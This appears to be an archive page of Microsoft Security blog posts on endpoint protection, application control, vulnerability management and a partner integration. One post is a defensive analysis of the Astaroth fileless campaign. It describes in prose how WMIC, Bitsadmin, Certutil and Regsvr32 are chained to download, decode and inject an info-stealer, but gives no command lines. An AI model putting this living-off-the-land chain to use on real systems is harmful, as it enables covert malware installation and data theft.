Category Archives: Threat Protection

How to cost-effectively manage and secure a mobile ecosystem

Today’s post was written by Roxane Suau, Vice President of Marketing for Pradeo.

In the corporate environment, mobile devices and applications are at the center of communications, enhancing collaborators’ productivity with 24/7 access to information. But at the same time, they represent thousands of direct entry points to organizations’ information systems, exposing critical data to the wide spectrum of mobile threats.

Our increasingly connected world is driving up the volume of cyberattacks targeting mobility. In 2017, there were 42 million attack attempts on mobile devices registered globally, and this number keeps growing.

While data protection laws urge companies to ensure mobile data privacy, security teams are struck with the challenge of protecting mobile devices, applications, and files while maintaining the flexibility collaborators need to be efficient.

The booming of mobility

According to a Gartner survey, nearly 80 percent of employees haven’t received employer-issued smartphones and more than 50 percent of them exclusively use their personal mobile device in the workplace (BYOD).

As organizations are more and more flexible regarding working tools and locations, employees often access business data and applications from home or public space using their mobile device, by connecting to unsecure networks.

Usually, cybercriminals leverage three vectors to infiltrate mobile devices: applications, the network, and the operating system (OS). Threats operating at the applicative level, such as leaky and malicious applications, are by far the most common and represent 78 percent of all attacks. Attacks perpetrated through the network and the OS count for 12 percent and 10 percent, respectively.

Enterprise mobility has led to the obsolescence of standard network security solutions historically used by companies, as they don’t cover the perimeter of mobile devices and applications. In recent years, the Mobile Threat Defense (MTD) technology has taken over.

Microsoft Intune unified endpoint management + Pradeo Security Mobile Threat Defense

Microsoft and Pradeo (a member of the Microsoft Intelligent Security Association) joined forces a few years ago to pursue a common goal: enable a productive and safe connected workspace.

To help companies set up a more secure and compliant environment, Microsoft Intune, a unified endpoint management platform, offers the functionalities necessary to manage and secure mobile devices and applications. Furthermore, it extends the activation of mobile security capabilities through partner integrations.

Pradeo Security Mobile Threat Defense (MTD) is designed to work with Intune to protect smartphones, tablets, mobile apps, and data. The solution relies on a behavioral analysis engine to precisely detect all actions performed on mobile devices (malware, data leakage, network exploit, OS manipulation). When activated in Intune, customers deploy the Pradeo Security agent on mobile devices to ensure their 360-degree real-time protection.

Pradeo stands out from other MTD solutions, which perform score-based risk evaluation, by being the only vendor on the market that offers an accurate mobile threat detection. Intune customers benefit from Pradeo’s precise threat detection directly in their UEM platform, strengthening their organization’s mobile security posture in the most cost-efficient way.

About Pradeo

Pradeo is a global leader of mobile security and a member of the Microsoft Intelligent Security Association. It offers services to protect the data handled on mobile devices and applications, and tools to collect, process, and get value out of mobile security events.

Pradeo’s cutting-edge technology has been recognized as one of the most advanced mobile security technology by Gartner, IDC, and 37 other research firms in 2018. It provides a reliable detection of mobile threats to prevent breaches and reinforce compliance with data privacy regulations.

For more details, visit or write to

Note: Users must be entitled separately to Pradeo and Microsoft licenses as appropriate.

The post How to cost-effectively manage and secure a mobile ecosystem appeared first on Microsoft Security.

Microsoft Intelligent Security Association welcomes members of the Microsoft Virus Initiative

As we head into our annual partner conference, Microsoft Inspire, I’m excited to make a major announcement! The Microsoft Virus Initiative (MVI) is formally joining the Microsoft Intelligent Security Association (MISA).

For more than 20 years, Microsoft and our antimalware partners have collaborated through MVI to help develop integrated and compatible solutions for Windows. MISA was created as an ecosystem of independent software vendors that have integrated their security solutions to help defend against a world of increasing threats. Our mission is to provide better security for our shared customers by integrating across the security ecosystem to gain more signals, increase visibility, and better protect against threats. That’s why we’re thrilled to welcome members of MVI!

Stopping malware at scale with the power of the cloud

Antivirus and antimalware products have long been the backbone of security solutions. As modern security products evolve, more antimalware providers are taking advantage of the power of the cloud, transforming how we protect, detect, and respond to threats at scale. Antimalware products play a key role in achieving our shared vision of collaboration that reduces security complexity and delivers better protection to customers.

By joining MISA, Microsoft’s antimalware partners will help break down silos and help customers realize the benefit of using solutions from multiple vendors in harmony. This is done by connecting the security ecosystem to gain more signal, increase visibility, and protect against threats.

At the annual MVI Partner Forum in Redmond, Washington, Microsoft reiterated that we’re investing heavily in both security and partnerships throughout the upcoming fiscal year. This includes expanding the size of the association and adding additional member benefits.

As a security provider to 95 percent of the Fortune 500, our customers are diverse and have different needs and configurations. In 2018, we created MISA to build an ecosystem of intelligent security solutions that better defend against a world of increased threats by sharing security signals across the Microsoft security stack. Since its launch, the organization has more than doubled, and we now have 59 members. Most recently, as part of Microsoft’s participation in the FIDO2 alliance, we welcomed new FIDO key partners Feitian and HID Global. You can read more about these partnerships in this recent blog.

Security ISVs interested in joining MISA can get started by building an integration with of the Microsoft security products included in MISA.

The post Microsoft Intelligent Security Association welcomes members of the Microsoft Virus Initiative appeared first on Microsoft Security.

Dismantling a fileless campaign: Microsoft Defender ATP next-gen protection exposes Astaroth attack

The prevailing perception about fileless threats, among the security industry’s biggest areas of concern today, is that security solutions are helpless against these supposedly invincible threats. Because fileless attacks run the payload directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk, they present challenges to traditional file-based solutions.

But let’s set the record straight: being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable. There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop.

To help disambiguate the term fileless, we developed a comprehensive definition for fileless malware as reference for understanding the wide range of fileless threats. We have also discussed at length the advanced capabilities in Microsoft Defender ATP that counter fileless techniques.

I recently unearthed a widespread fileless campaign called Astaroth that completely “lived off the land”: it only ran system tools throughout a complex attack chain. The attack involved multiple steps that use various fileless techniques and proved a great real-world benchmark for Microsoft Defender ATP’s capabilities against fileless threats.

In this blog, I will share my analysis of a fileless attack chain that demonstrates:

  • Attackers would go to great lengths to avoid detection
  • Advanced technologies in Microsoft Defender ATP next-generation protection expose and defeat fileless attacks

Exposing a fileless info-stealing campaign with Microsoft Defender ATP next-generation protection

I was doing a standard review of Windows Defender Antivirus telemetry when I noticed an anomaly from a detection algorithm designed to catch a specific fileless technique. Telemetry showed a sharp increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script (a technique that MITRE refers to XSL Script Processing), indicating a fileless attack.

Figure 1. Windows Defender Antivirus telemetry shows a sudden increase in suspicious activity

After some hunting, I discovered the campaign that aimed to run the Astaroth backdoor directly in memory. Astaroth is a notorious info-stealing malware known for stealing sensitive information like credentials, keystrokes, and other data, which it exfiltrates and sends to a remote attacker. The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While the behavior may slightly vary in some instances, the attack generally followed these steps: A malicious link in a spear-phishing email leads to an LNK file. When double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool.

All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.

Figure 2. Astaroth “living-off-the-land” attack chain showing multiple legitimate tools abused

It’s interesting to note that at no point during the attack chain is any file run that’s not a system tool. This technique is called living off the land: using legitimate tools that are already present on the target system to masquerade as regular activity.

The attack chain above shows only the Initial Access and Execution stages. In these stages, the attackers used fileless techniques to attempt to silently install the malware on target devices. Astaroth is a notorious information stealer with many other post-breach capabilities that are not discussed in this blog. Preventing the attack in these stages is critical.

Despite its use of “invisible” techniques, the attack chain runs under the scrutiny of Microsoft Defender ATP. Multiple advanced technologies at the core of Windows Defender Antivirus, which is the next-generation protection component of Microsoft Defender ATP, expose these techniques to spot and stop a wide range of attacks.

These protection technologies stop threats at first sight, use the power of the cloud, and leverage Microsoft’s industry-leading optics to deliver effective protection. This defense-in-depth is observed in the way these technologies uncovered and blocked the attack at multiple points in Astaroth’s complex attack chain.

Figure 3. Microsoft Defender ATP solutions for fileless techniques used by Astaroth

For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded—after all, every executable used in the attack is non-malicious. If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.

However, as mentioned, next generation protection capabilities in Microsoft Defender ATP catch fileless techniques. Let’s break down the attack steps, enumerate the techniques used using MITRE technique ID as reference, and map the relevant Microsoft Defender ATP protection.


Step 1: Arrival

The victim receives an email with a malicious URL:

The URL uses misleading names like certidao.htm (Portuguese for “certificate”), abrir_documento.htm (“open document”), pedido.htm (“order”), etc.

When clicked, the malicious link redirects the victim to the ZIP archive, which contains a similarly misleading named LNK file certidao.htm.lnk. When clicked, the LNK file runs an obfuscated BAT command-line.

MITRE techniques observed:

  • T1192 – Spearphishing Link
  • T1023 – Shortcut Modification

Microsoft Defender ATP next-gen protection defenses:

  • Command-line scanning: Trojan:Win32/BadEcho.A
  • Heuristics engine: Trojan:Win32/Linkommer.A
  • Windows Defender SmartScreen


Step 2: WMIC abuse, part 1

The BAT command runs the system tool WMIC.exe:

The use of the parameter /format causes WMIC to download the file v.txt, which is an XSL file hosted on a legitimate-looking domain. The XSL file hosts an obfuscated JavaScript that is automatically run by WMIC. This JavaScript code simply runs WMIC again.

MITRE techniques observed:

  • T1047 – Windows Management Instrumentation
  • T1220 – XSL Script Processing
  • T1064 – Scripting
  • T1027 – Obfuscated Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmiFormatXslScripting
  • AMSI integration engine: Trojan:JS/CovertXslDownload.


Step 3: WMIC abuse, part 2

WMIC is run in a fashion similar to the previous step:

WMIC downloads vv.txt, another XSL file containing an obfuscated JavaScript code, which uses the Bitsadmin, Certutil, and Regsvr32 tools for the next steps.

MITRE techniques observed:

  • T1047 – Windows Management Instrumentation
  • T1220 – XSL Script Processing
  • T1064 – Scripting
  • T1027 – Obfuscated Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmiFormatXslScripting
  • Behavior monitoring engine: Behavior:Win32/WmicLoadDll.A
  • AMSI integration engine: Trojan:JS/CovertBitsDownload.C


Step 4: Bitsadmin abuse

Multiple instances of Bitsadmin are run to download additional payloads:

The payloads are Base64-encoded and have file names like: falxconxrenwb.~, falxconxrenw64.~, falxconxrenwxa.~, falxconxrenwxb.~, falxconxrenw98.~, falxconxrenwgx.gif, falxfonxrenwg.gif.

MITRE techniques observed:

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmicBits.A


Step 5: Certutil abuse

The Certutil system tool is used to decode the downloaded payloads:

Only a couple of files are decoded to a DLL; most are still encrypted/obfuscated.

MITRE technique observed:

  • T1140 – Deobfuscate/Decode Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/WmiCertutil.A


Step 6: Regsvr32 abuse

One of the decoded payload files (a DLL) is run within the contexct of the Regsvr32 system tool:

The file falxconxrenw64.~ is a proxy: it loads and runs a second DLL, falxconxrenw98.~, and passes it to a third DLL that is obtained by reading files falxconxrenwxa.~ and falxconxrenwxb.~. The DLL falxconxrenw98.~ then reflectively loads the third DLL.

MITRE techniques observed:

  • T1117 – Regsvr32
  • T1129 – Execution Through Module Load
  • T1140 – Deobfuscate/Decode Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  •  Behavior monitoring engine: Behavior:Win32/UserinitInject.B
  • Attack surface reduction: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)


Step 7: Userinit abuse

The newly loaded DLL reads and decrypts the file falxconxrenwgx.gif into a DLL. It runs the system tool userinit.exe into which it injects the decrypted DLL. The file falxconxrenwgx.gif is again a proxy that reads, decrypts, and reflectively loads the DLL falxconxrenwg.gif. This last DLL is the malicious info stealer known as Astaroth.

MITRE techniques observed:

  • T1117 – Regsvr32
  • T1129 – Execution Through Module Load
  • T1140 – Deobfuscate/Decode Files Or Information

Microsoft Defender ATP next-gen protection defenses:

  • Behavior monitoring engine: Behavior:Win32/Astaroth.A
  • Attack surface reduction: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)

Comprehensive protection against fileless attacks with Microsoft Threat Protection

The strength of next-generation protection engines in exposing fileless techniques add to the capabilities of the unified endpoint protection platform, Microsoft Defender ATP. Activities related to fileless techniques are reported in Microsoft Defender Security Center as alerts, so security operations teams can further investigate and respond to attacks using endpoint detection and response, advanced hunting, and other capabilities in Microsoft Defender ATP.


Figure 4. Details of Windows Defender Antivirus detections of fileless techniques and malware reported in Microsoft Defender Security Center; details also indicate whether threat is remediated, as was the case with the Astaroth attack

The rest of Microsoft Defender ATP’s capabilities beyond next-generation protection enable security operations teams to detect and remediate fileless threats and other attacks. Notably, Microsoft Defender ATP endpoint detection and response (EDR) has strong and durable detections for fileless and living-off-the-land techniques across the entire attack chain.


Figure 5. Alerts in Microsoft Defender Security Center showing detection of fileless techniques by antivirus and EDR capabilities

We also published a threat analytics report on living-off-the-land binaries to help security operations assess organizational security posture and resilience against these threats. New Microsoft Defender ATP services like threat and vulnerability management and Microsoft Threat Experts (managed threat hunting), further assist organizations in defending against fileless threats.

Through signal-sharing and orchestration of threat remediation across Microsoft’s security technologies, these protections are further amplified in Microsoft Threat Protection, Microsoft’s comprehensive security solution for the modern workplace. For this Astaroth campaign, Office 365 Advanced Threat Protection (Office 365 ATP) detects the emails with malicious links that start the infection chain.

Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.

Conclusion: Fileless threats are not invisible

To come back to one of my original points in this blog post, being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable.

An analogy: Pretend you are transported to the world of H.G. Wells’ The Invisible Man and can render yourself invisible. You think, great, you can walk straight into a bank and steal money. However, you soon realize that things are not as simple as they sound. When you walk out in the open and it’s cold, your breath’s condensation gives away your position; depending on the type of the ground, you can leave visible footmarks; if it’s raining, water splashing on you creates a visible outline. If you manage to get inside the bank, you still make noise that security guards can hear. Motion detection sensors can feel your presence, and infrared cameras can still see your body heat. Even if you can open a safe or a vault, these storage devices may trigger an alert, or someone may simply notice the safe opening. Not to mention that if you somehow manage to grab the money and put them in a bag, people are likely to notice a bag that’s walking itself out of the bank.

Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.

Using invisible techniques and being actually invisible are two different things. Using advanced technologies, Microsoft Defender ATP exposes fileless threats like Astaroth before these attacks can cause more damage.


Andrea Lelli
Microsoft Defender ATP Research



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post Dismantling a fileless campaign: Microsoft Defender ATP next-gen protection exposes Astaroth attack appeared first on Microsoft Security.

Microsoft’s Threat & Vulnerability Management now helps thousands of customers to discover, prioritize, and remediate vulnerabilities in real time

I’m excited to announce that Microsoft’s Threat & Vulnerability Management solution is generally available as of June 30! We have been working closely with customers for more than a year to incorporate their real needs and feedback to better address vulnerability management. Our goal is to empower defenders with the tools they need to better protect against evolving threats, and we believe this solution will help provide that additional visibility and agility they need.

Threat & Vulnerability Management (TVM) is a built-in capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that uses a risk-based approach to discover, prioritize, and remediate endpoint vulnerabilities and misconfigurations. With Microsoft Defender ATP’s Threat & Vulnerability Management, customers benefit from:

  • Continuous discovery of vulnerabilities and misconfigurations
  • Prioritization based on business context and dynamic threat landscape
  • Correlation of vulnerabilities with endpoint detection and response (EDR) alerts to expose breach insights
  • Machine-level vulnerability context during incident investigations
  • Built-in remediation processes through unique integration with Microsoft Intune and Microsoft System Center Configuration Manager

Traditional vulnerability scanning only happens periodically, leaving organizations with security blind spots between scans. The one-size-fits-all approach that these traditional solutions use ignores critical business-specific context, as well as the dynamic threat landscape. This is coupled with the fact that mitigation of vulnerabilities is a manual process, often across teams, that can take days, weeks, or months to complete. This leaves a window of opportunity for attackers and puts our defenders in a tough spot.

To address these challenges Microsoft partnered with a dozen enterprise customers on the design and creation of this new Threat & Vulnerability Management solution. One of them is Telit, a global leader in IoT enablement offering end-to-end IoT solutions, including enterprise-grade hardware, connectivity, platform, and consulting services. Telit already had a well-defined vulnerability management program in place, but said they were missing several critical capabilities, including visibility, prioritization, and remediation.

Our design partners play a key role throughout the entire process, from planning and building to operationalizing and maturing the product so we can deliver the best experience. Many of our customers have existing vulnerability management programs, so we knew that to have them switch to Microsoft we would need a disruptive approach to vulnerability management. From private preview to general availability and beyond, our key goals were to bridge the gap between Security and IT roles in threat protection, to reduce time to threat resolution while enabling real-time prioritization and risk reduction based on the evolving threat landscape and business context. The team continues to incorporate feedback from customers and partners, adding these new capabilities on a monthly basis.

“Telit’s previous threat and vulnerability solutions were limited to on-premises connected endpoints. Moving to Microsoft’s TVM cloud-based solution provides us much better visibility into roaming endpoints with a continuous assessment, especially when our endpoints are connected to untrusted networks.”
— Itzik Menashe, VP of IT & Information Security, Telit

Working together with Telit, we quickly understood that the current prioritization norm is not enough to properly reduce risk in an organization. We consulted with our partners on a new risk-based approach, which is focused on continuous discovery of vulnerabilities and misconfigurations and correlated those insights with context specific to their business and the dynamic threat landscape.

Microsoft’s built-in, end-to-end remediation process helps Telit bridge the gap between their security and operations teams. The unique integration with Microsoft Intune allows their security team to create remediation requests with a click of a button, and the operations team receives the requests automatically with all relevant information and can start the remediation process right away. The security team can then watch their exposure score drop in real time as remediation progresses.

“Microsoft’s TVM provides Telit with an easy-to-use solution that incorporates strong discovery capabilities, a risk-based approach to prioritization, and an effective remediation process. With this solution we are able to cover a large number of endpoints using a very small team of security engineers.”
— Mor Asher, Global IT and Information Security Manager, Telit

The product experience and ease of implementation was a big driver for Telit and thousands of other active customers to start using Microsoft Defender ATP Threat & Vulnerability Management. Telit had Microsoft Defender ATP’s TVM up and running within seconds.

To learn more about threat and vulnerability management watch our video that walks you through the experience.

If you already have Microsoft Defender ATP, the TVM solution is now available within your ATP portal. If you would like to sign up for a trial of Microsoft Defender ATP including TVM, sign up here.

We’re excited for our customers to evaluate this new solution and are looking forward to continued feedback.

The post Microsoft’s Threat & Vulnerability Management now helps thousands of customers to discover, prioritize, and remediate vulnerabilities in real time appeared first on Microsoft Security.

Delivering major enhancements in Windows Defender Application Control with the Windows 10 May 2019 Update

With the Windows 10 May 2019 Update we delivered several important features for Windows Defender Application Control (WDAC), which was originally introduced to Windows as part of a scenario called Device Guard. WDAC works in conjunction with features like Windows Defender Application Guard, which provides hardware-based isolation of Microsoft Edge for enterprise-defined untrusted sites, to strengthen the security posture of Windows 10 systems.

Our focus for this release was responding to some longstanding feedback on manageability improvements. We’re excited to introduce the following new capabilities in Windows Defender Application Control:

  1. File path rules, including optional runtime admin protection checks
  2. Multiple policy file support with composability
  3. Application Control CSP to provide a new, richer MDM policy management capability
  4. COM object registration support in policy
  5. Disabling script enforcement rule option

Application control is frequently identified as one of the most effective mitigations against modern security threats, because anything that’s not allowed by policy is blocked from running. Even striving towards a simple policy like mandating that only signed code is allowed to execute can be incredibly impactful: in a recent analysis of Windows Defender ATP data, we saw that 96% of malware encountered is unsigned. Systems like Windows 10 in S mode, which uses WDAC technology to enforce that all code must be signed by Windows and Microsoft Store code signing certificates, have no malware infection issues.

The new capabilities are designed to ease the journey for customers adopting application control in real-world environments with large numbers of applications, users, and devices.

File path rules, including optional runtime admin protection checks

For many customers looking to adopt application execution control while balancing IT overhead, rules based on file paths on managed client systems provide a useful model. The Windows 10 May 2019 Update introduces support for both allow and deny rules based on file path in Windows Defender Application Control.

File path rules had been one of the few features available in AppLocker, the older native application control technology, that were not available to WDAC; deployment tools and methodologies built on top of AppLocker like AaronLocker have relied on these rules as an important simplifying option for policy management. As we sought to close that gap, we wanted to preserve the stronger security posture available with WDAC that customers have come to expect. To this end, WDAC applies, by default, an option to check at runtime that apps and executables allowed based on file path rules must come from a file path that’s only writable by administrator or higher privileged accounts. This runtime check provides an additional safeguard for file path rules that are otherwise inherently weaker than other identifiers like hash or signer rules, which rely on cryptographically verifiable attributes.

This runtime capability can be controlled with the “Disabled:Runtime FilePath Rule Protection” rule option.

The following example shows how to easily create rules for anything allowed under “Program Files” and “Program Files (x86)”, and then merge them with the sample policy that allows all Windows signed code (available under C:\Windows\schemas\CodeIntegrity\ExamplePolicies). The resulting merged policy file allows all Windows signed code and applications installed under “Program Files” and “Program Files (x86)” with the runtime protection that checks that anything executing under those paths is coming from a location only writable by administrator or higher privileged accounts.

Sample file path rules

Multiple policy file support with composability

Limiting support to a single policy file means that a variety of app control scenarios from potentially different stakeholders or business groups need to be maintained in one place. This comes with an associated overhead: the coordination required to converge on the appropriate rules encapsulated in a single policy file.

With the Windows 10 May 2019 Update multiple policy files are supported for WDAC. To facilitate composing behavior from multiple policy files, we have introduced the concept of base and supplemental policies:

  • Base policies – For any execution to be allowed, the application must pass each base policy independently. Base policies are used together to further restrict what’s allowed. For example:
    Let’s assume a system has two policies: Base Policy A and Base Policy B with their own sets of rules. For foo.exe to run, it must be allowed by the rules in Base Policy A and also the rules in Base Policy B. Windows Defender Application Control policies on prior Windows 10 systems will continue to work on the May 2019 Update and will be treated as base policies.
  • Supplemental policies – As the name suggests, supplemental policies complement base policies with additional rules to be considered as part of the base policies they correspond to. Supplemental policies are tied to a specific base policy with an ID; a base policy may have multiple supplemental policies. Supplemental policies expand what is allowed by any base policy, but deny rules specified in a supplemental policy will not be honored.

Application Control CSP

Customers have been able to deploy Windows Defender Application Control policies via MDM using the CodeIntegrity node of the AppLocker configuration service provider (CSP). The AppLocker CSP has a number of limitations, most notably the lack of awareness of rebootless policy deployment support.

The Windows 10 May 2019 Update now has a new Application Control CSP, which introduces much richer support for policy deployment over MDM and also provides support for:

  • Rebootless policy deployment (For policies that have the “Enabled:Update Policy No Reboot” option set, the new Application Control CSP will not schedule a reboot on client systems getting the policy)
  • Support for the new multiple policies
  • For device management software vendors, better error reporting

COM object registration support

Windows Defender Application Control enforces a built-in allow list of COM object registrations to reduce the risk introduced from certain powerful COM objects. Customers have reported that while this capability is desirable from a security perspective, there are specific cases in their environments where they’d like to allow the registration of additional COM objects required for their business.

With the Windows 10 May 2019 Update customers can now specify COM objects that need to be allowed in environments they’re managing with Windows Defender Application Control policies.

Disabled: Script Enforcement rule option support

The Windows 10 May 2019 Update with KB4497935 introduces proper support for the Disabled: Script Enforcement rule option.

Customers recognize the importance of having restrictions on script hosts but are often looking to break up their application control projects into smaller chunks to help with deployment feasibility. The “Disabled:Script Enforcement” rule option in the policy now turns off policy enforcement for MSIs, PowerShell scripts, and wsh-hosted scripts. This will allow IT departments to tackle EXE, DLL, and driver enforcement without needing to also simultaneously address script host control.

Disabled: Script Enforcement rule

Try the new capabilities today

We invite everyone to try these new Windows Defender Application Control capabilities, alongside existing features like managed installer. For customers using Microsoft Defender ATP, consider using Advanced hunting to query the WDAC events centrally to understand and monitor the behavior of all these new policy controls on client machines in your environment. Learn about both new and existing functionalities with the Windows Defender Application Control deployment guide.

We’re also working on supplementing the documentation we have out now. Stay tuned for updates from our team for tools and guidance on GitHub that provide more practical examples and ready-to-use scripts.


Nazmus Sakib
Senior Program Manager, Windows Defender Application Control team

The post Delivering major enhancements in Windows Defender Application Control with the Windows 10 May 2019 Update appeared first on Microsoft Security.

Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection

While Windows Defender Antivirus makes catching 5 billion threats on devices every month look easy, multiple advanced detection and prevention technologies work under the hood to make this happen.

Windows Defender Antivirus is the next-generation protection component of Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP), Microsoft’s unified endpoint security platform. Much like how Microsoft Defender ATP integrates multiple capabilities to address the complex security challenges in modern enterprises, Windows Defender Antivirus uses multiple engines to detect and stop a wide range of threats and attacker techniques at multiple points.

These next-generation protection engines provide industry-best detection and blocking capabilities. Many of these engines are built into the client and provide advanced protection against majority of threats in real-time. When the client encounters unknown threats, it sends metadata or the file itself to the cloud protection service, where more advanced protections examine new threats on the fly and integrate signals from multiple sources.

These next-generation protection engines ensure that protection is:

  • Accurate: Threats both common and sophisticated, a lot of which are designed to try and slip through protections, are detected and blocked
  • Real-time: Threats are prevented from getting on to devices, stopped in real-time at first sight, or detected and remediated in the least possible time (typically within a few milliseconds)
  • Intelligent: Through the power of the cloud, machine learning (ML), and Microsoft’s industry-leading optics, protection is enriched and made even more effective against new and unknown threats

My team continuously enhances each of these engines to be increasingly effective at catching the latest strains of malware and attack methods. These enhancements show up in consistent top scores in industry tests, but more importantly, translate to threats and malware outbreaks stopped and more customers protected.

Here’s a rundown of the many components of the next generation protection capabilities in Microsoft Defender ATP:

In the cloud:

  • Metadata-based ML engine – Specialized ML models, which include file type-specific models, feature-specific models, and adversary-hardened monotonic models, analyze a featurized description of suspicious files sent by the client. Stacked ensemble classifiers combine results from these models to make a real-time verdict to allow or block files pre-execution.
  • Behavior-based ML engine – Suspicious behavior sequences and advanced attack techniques are monitored on the client as triggers to analyze the process tree behavior using real-time cloud ML models. Monitored attack techniques span the attack chain, from exploits, elevation, and persistence all the way through to lateral movement and exfiltration.
  • AMSI-paired ML engine – Pairs of client-side and cloud-side models perform advanced analysis of scripting behavior pre- and post-execution to catch advanced threats like fileless and in-memory attacks. These models include a pair of models for each of the scripting engines covered, including PowerShell, JavaScript, VBScript, and Office VBA macros. Integrations include both dynamic content calls and/or behavior instrumentation on the scripting engines.
  • File classification ML engine – Multi-class, deep neural network classifiers examine full file contents, provides an additional layer of defense against attacks that require additional analysis. Suspicious files are held from running and submitted to the cloud protection service for classification. Within seconds, full-content deep learning models produce a classification and reply to the client to allow or block the file.
  • Detonation-based ML engine – Suspicious files are detonated in a sandbox. Deep learning classifiers analyze the observed behaviors to block attacks.
  • Reputation ML engine – Domain-expert reputation sources and models from across Microsoft are queried to block threats that are linked to malicious or suspicious URLs, domains, emails, and files. Sources include Windows Defender SmartScreen for URL reputation models and Office 365 ATP for email attachment expert knowledge, among other Microsoft services through the Microsoft Intelligent Security Graph.
  • Smart rules engine – Expert-written smart rules identify threats based on researcher expertise and collective knowledge of threats.

On the client:

  • ML engine – A set of light-weight machine learning models make a verdict within milliseconds. These include specialized models and features that are built for specific file types commonly abused by attackers. Examples include models built for portable executable (PE) files, PowerShell, Office macros, JavaScript, PDF files, and more.
  • Behavior monitoring engine – The behavior monitoring engine monitors for potential attacks post-execution. It observes process behaviors, including behavior sequence at runtime, to identify and block certain types of activities based on predetermined rules.
  • Memory scanning engine – This engine scans the memory space used by a running process to expose malicious behavior that may be hiding through code obfuscation.
  • AMSI integration engine – Deep in-app integration engine enables detection of fileless and in-memory attacks through Antimalware Scan Interface (AMSI), defeating code obfuscation. This integration blocks malicious behavior of scripts client-side.
  • Heuristics engine – Heuristic rules identify file characteristics that have similarities with known malicious characteristics to catch new threats or modified versions of known threats.
  • Emulation engine – The emulation engine dynamically unpacks malware and examines how they would behave at runtime. The dynamic emulation of the content and scanning both the behavior during emulation and the memory content at the end of emulation defeat malware packers and expose the behavior of polymorphic malware.
  • Network engine – Network activities are inspected to identify and stop malicious activities from threats.

Together with attack surface reduction—composed of advanced capabilities like hardware-based isolation, application control, exploit protection, network protection, controlled folder access, attack surface reduction rules, and network firewall—these next-generation protection engines deliver Microsoft Defender ATP’s pre-breach capabilities, stopping attacks before they can infiltrate devices and compromise networks.

As part of Microsoft’s defense-in-depth solution, the superior performance of these engines accrues to the Microsoft Defender ATP unified endpoint protection, where antivirus detections and other next-generation protection capabilities enrich endpoint detection and response, automated investigation and remediation, advanced hunting, threat and vulnerability management, managed threat hunting service, and other capabilities.

These protections are further amplified through Microsoft Threat Protection, Microsoft’s comprehensive, end-to-end security solution for the modern workplace. Through signal-sharing and orchestration of remediation across Microsoft’s security technologies, Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.

The enormous evolution of Microsoft Defender ATP’s next generation protection follows the same upward trajectory of innovation across Microsoft’s security technologies, which the industry recognizes, and customers benefit from. We will continue to improve and lead the industry in evolving security.


Tanmay Ganacharya (@tanmayg)
Principal Director, Microsoft Defender ATP Research




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection appeared first on Microsoft Security.